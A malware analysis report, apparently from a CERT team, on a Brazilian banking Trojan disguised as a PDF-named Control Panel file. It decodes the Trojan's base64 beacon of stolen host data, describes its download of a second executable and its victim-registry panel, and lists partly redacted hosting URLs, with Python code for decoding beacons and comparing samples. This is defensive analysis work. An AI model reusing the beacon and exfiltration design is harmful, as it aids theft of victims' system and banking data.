Banking Trojan that presents itself as a Control Panel icon

Summary

The sample analyzed on this occasion was obtained from a report made to the Malware Analysis Team of UNAM-CERT, which informed us about some allegedly malicious programs found on Brazilian web sites. The analysis showed that the sample sends information about the infected computer, such as the operating system, user privileges, bank security plugins and IP address, to a log that appears to be hosted at a legitimate URL.

Introduction

It can be seen in the picture below that the extension of the downloaded file is "cpl". CPL files are dynamic link libraries (DLLs) that contain the functionality of the icons in the Control Panel, i.e., each of the tools you see corresponds to a cpl file in the C:\WINDOWS\System32\ directory that is loaded automatically when the user starts the Control Panel. Unlike .dll files, files with the cpl extension can be executed by double-clicking on them.

In the context of malicious software, cpl is an executable file format widely used by developers of banking Trojans, particularly in Brazil. As mentioned in the research done by Trend Micro, the most common form of propagation for this type of malware is through emails that appear to come from known financial organizations and convince the victims to click on a link to download receipts or check their transactions. In this case the name of the sample, which appears to be a PDF file, includes the word "pedido", which can be translated as "application".

Dynamic Analysis

The sample was executed in a controlled environment without Internet access, and network traffic was monitored with Wireshark. In the screenshot you can see the requests made to the domains ecoxxxxx.com.br and ricxxx.com.br.

Once these domains are resolved, the sample attempts to connect to port 80 (HTTP). The cpl file, like any 32-bit DLL, is loaded into memory and executed by the rundll32.exe Windows utility.

The sample makes a GET request for the file "unistals.txt" on the domain "ricxxx.com.br" and sends a string in the "query" parameter to the domain "acoxxxxx.com.br", as shown in the network traffic below.

Using the contents of the file "unistals.txt", hosted on the server of the domain ricxxx.com.br, the sample creates an executable called "unistals.exe" in C:\Documents and Settings\User\Application Data\. Because the first tests were conducted in an environment without Internet access, these files, and the directories that stored them, were created in the /var/www/ directory of a test server.

The contents of unistals.exe are shown below:

The file Songs.exe is also created in C:\Documents and Settings\User\Application Data\, without content.

Network Activity

The following base64-encoded string is sent, as seen in the next capture:

YWRtaW4sNDgtNDctQkItNEItQkItNDcsV2luZG93cyBYUCgzMiksMTAwLFVOS05PV04tRjkzRDMwRSwsLG5hbw==

Its ASCII representation is:

admin, 48-47-BB-4B-BB-47, Windows XP(32), 100, UNKNOWN-F93D30E, , , nao
(eight comma-separated fields, numbered 1 to 8 from left to right)

At first glance, it can be deduced that:

1 = Privileges of the user that logged in

2 = MAC address of the computer

3 = Windows Version

5 = Computer Name

When we consulted the URL of the file that the sample needed, http://www.rixxxx.com.br/imagens/xxxxxx/files/unistals.txt, we found that it was no longer available, while www.ecoxxxxx.com.br/modules/mods/sis.php did not show any information.

However, when the base64-encoded string was written directly as a parameter in the browser, we were redirected to www.ecoxxxxx.com.br/modules/xxxx/sis.php?query=Listar, which seems to be a registry of infected computers. From the column names it is possible to identify fields 4, 6, 7 and 8 of the encoded string that the infected computer sent to the ecoxxxxx.com.br site using the GET method:

4 = Possibly the version of the Trojan

6 = Security plugins of the banks

7 = Antivirus installed on the infected computer

8 = Commands
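As an added example (not part of the original analysis), the following Python decodes the captured "query" value into the eight fields identified above and scans constructed proxy-style log lines for such beacons; the field names and the log line format are assumptions made for illustration.

```python
import base64
import binascii
from urllib.parse import urlsplit, parse_qs

# Field names as deduced in the analysis (positions 1 to 8 of the decoded string).
FIELDS = ("privileges", "mac", "os", "version", "hostname",
          "bank_plugins", "antivirus", "command")


def decode_beacon(query_value):
    """Decode the base64 'query' value into a dict of the eight fields.

    Returns None when the value is not a well-formed beacon, e.g. the
    'Listar' listing request, which is not valid base64 of eight fields."""
    try:
        raw = base64.b64decode(query_value, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None
    parts = raw.split(",")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, (p.strip() for p in parts)))


def beacons_from_log(lines):
    """Scan constructed '<client> GET <url> <status>' log lines for requests
    to sis.php and return the decoded beacons found in their 'query' parameter."""
    hits = []
    for line in lines:
        if " GET " not in line or "/sis.php?" not in line:
            continue
        url = line.split(" GET ", 1)[1].split(" ", 1)[0]
        for value in parse_qs(urlsplit(url).query).get("query", []):
            beacon = decode_beacon(value)
            if beacon is not None:
                hits.append(beacon)
    return hits


# Constructed log lines; the encoded string is the one captured in the analysis.
SAMPLE_LOG = [
    "192.168.1.20 GET http://www.ecoxxxxx.com.br/modules/mods/sis.php?query="
    "YWRtaW4sNDgtNDctQkItNEItQkItNDcsV2luZG93cyBYUCgzMiksMTAwLFVOS05PV04tRjkzRDMwRSwsLG5hbw== 200",
    "192.168.1.20 GET http://www.ecoxxxxx.com.br/modules/mods/sis.php?query=Listar 200",
    "192.168.1.21 GET http://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for beacon in beacons_from_log(SAMPLE_LOG):
        print(beacon)
```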

Clicking on the “Totalizar” link displays the total number of registered computers which, at the time of the analysis, was 753.

Most of the infected computers were from Brazil, although on the list we also found:

  • 15 from the United States
  • 2 from Spain
  • 2 from Germany
  • 2 from the United Kingdom
  • 1 from Argentina
  • 1 from the Philippines
  • 1 from Australia
  • 1 from Switzerland
  • 1 from Holland

As for the operating systems of the infected computers, the results were as follows:

  • 172 with Windows XP
  • 529 with Windows 7
  • 24 with Windows 8
  • 18 with Windows Vista
  • 1 with Windows Server 2003
  • 9 with systems unknown to the Trojan

On the “Plugins” field there were references to the following Brazilian institutions:

  • BB = Banco do Brasil
  • SANTA = Santander
  • BRADA = Banco Bradesco
  • ITAU = Banco Itaú
  • CEF = Caixa Econômica Federal
  • SICREDI = Banco Sicredi
  • INFOSEG = Integrates the databases of the public security departments of Brazil
  • BANESTES = Banco do Estado do Espírito Santo
  • MERCANTIL = Banco Mercantil do Brasil

Searching Google for the string "NF_pedido04 - 4589511.pdf" returns 73 results, mostly related to analyses of the file or to URLs from which the sample could be downloaded. The following table lists the URLs found, whether the Trojan is still active there, and the web server. In most cases the malicious program was hosted in directories containing images. At the sites with an "Inactive" status, access to these directories has been restricted and the Trojan has been deleted.

URL                                                                       State     Web Server
http://prexxxxx.com.br/fotos/nf_pedido04-4589511.pdf.zip                  Inactive  IIS
http://proxxx.agr.br/imgs/NF_Pedido04-4589511.pdf.zip                     Inactive  IIS
http://camaraxxxxxxxxx.sp.gov.br/NF_Pedido04-4589511.pdf.zip              Inactive  IIS
www.interxxxxxxxxx.com.br/imagens-produtos/NF_Pedido04-4589511.pdf.zip    Active    IIS
http://xxxxresponde.com.br/wp-content/NF_Pedido04-4589511.pdf.zip         Active    Apache
http://200.xxx.xxx.7/images/NF_Pedido04-4589511.pdf.zip                   Active    Apache

We downloaded the files from the active sites and compared their MD5 hashes to see whether we were dealing with the same sample. As can be seen, there are three unique samples, probably from the same malware family. This can be tested in several ways: using VirusTotal or even a single antivirus, analyzing the samples statically or dynamically, or using a heuristic method.

This time we will use a heuristic method based on system calls. The general procedure is as follows: for each sample, the number of functions it imports from each dynamic link library is extracted to build a numerical vector, and then the Euclidean distance between the vector of the original sample and the vectors of samples b, c and d is calculated. If the downloaded samples are similar to the analyzed sample, the distance between them will be small.
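The distance computation described above, as an added example that is not the analysis team's own code: the import counts below are constructed values (not those from the analysis), and the optional PE extraction helper assumes the third-party pefile package and an already-unpacked sample.

```python
import math


def import_counts_from_pe(path):
    """Count the functions a PE file imports from each DLL.

    Uses the third-party pefile package (an assumption, not part of the
    original analysis); run it on the unpacked sample, since a UPX-packed
    file only exposes the packer's minimal import table."""
    import pefile
    pe = pefile.PE(path)
    counts = {}
    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        dll = entry.dll.decode("ascii", "replace").lower()
        counts[dll] = counts.get(dll, 0) + len(entry.imports)
    return counts


def euclidean(counts_a, counts_b):
    """Euclidean distance between two samples' import-count vectors.

    The vectors are built over the union of DLL names, so a library that
    only one sample imports counts as 0 for the other sample."""
    dlls = sorted(set(counts_a) | set(counts_b))
    return math.sqrt(sum((counts_a.get(d, 0) - counts_b.get(d, 0)) ** 2 for d in dlls))


def rank_by_similarity(reference, candidates):
    """Return (name, distance) pairs, most similar to the reference first."""
    ranked = [(name, euclidean(reference, c)) for name, c in candidates.items()]
    return sorted(ranked, key=lambda pair: pair[1])


# Constructed import counts per DLL (illustrative only, not the analysis values).
ORIGINAL = {"kernel32.dll": 40, "user32.dll": 12, "advapi32.dll": 8, "wininet.dll": 5}
CANDIDATES = {
    "b": {"kernel32.dll": 43, "user32.dll": 12, "advapi32.dll": 8, "wininet.dll": 5},
    "c": {"kernel32.dll": 40, "user32.dll": 12, "advapi32.dll": 8, "wininet.dll": 5,
          "shell32.dll": 4},
    "d": {"kernel32.dll": 10, "msvcrt.dll": 30},
}

if __name__ == "__main__":
    for name, dist in rank_by_similarity(ORIGINAL, CANDIDATES):
        print(f"sample {name}: distance {dist:.2f}")
```

Samples b and c land at small distances from the reference, while d, with a different import profile, is far away.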


As can be seen in the picture above, the samples are similar, so we can say they belong to the same malware family.

Technical Details

As mentioned in previous analyses, step one is to determine whether the sample is packed. The Exeinfo PE tool was used and the result indicated that the sample was compressed with UPX. It is noteworthy that samples b and d, downloaded from the compromised websites, were also packed with UPX.

The packer is removed from the command line.

We opened the unpacked sample in IDA Pro to analyze it and checked the strings to see whether we could obtain useful data about the sample's functionality.

The domains the sample contacted were not found among the strings, nor were the names of the downloaded executables, the directories or the modified registry keys. Instead, there were strings that appear to be encrypted, which leads us to believe that the creators of this malware hid important data to hinder analysis of the sample.

The VirusTotal reports of the analyzed Trojan and of the similar samples downloaded from the URLs with malicious content are shown below:

https://www.virustotal.com/en/file/699714f3545e0d2142e486b908bdaadf3dd5b714653002a4dd1ec3de25465bc3/analysis/1398125369/

https://www.virustotal.com/en/file/2511e8186fe5cc1c8df128e38b0ce9e9699671bcc9877c6b9b6f99cbb756d29d/analysis/

https://www.virustotal.com/en/file/5d8a54674981e47f8af7663f4ac595059557d8f669b16ef2c561b5ab59788083/analysis/1398125742/

The URLs have already been reported to prevent this Trojan from propagating further.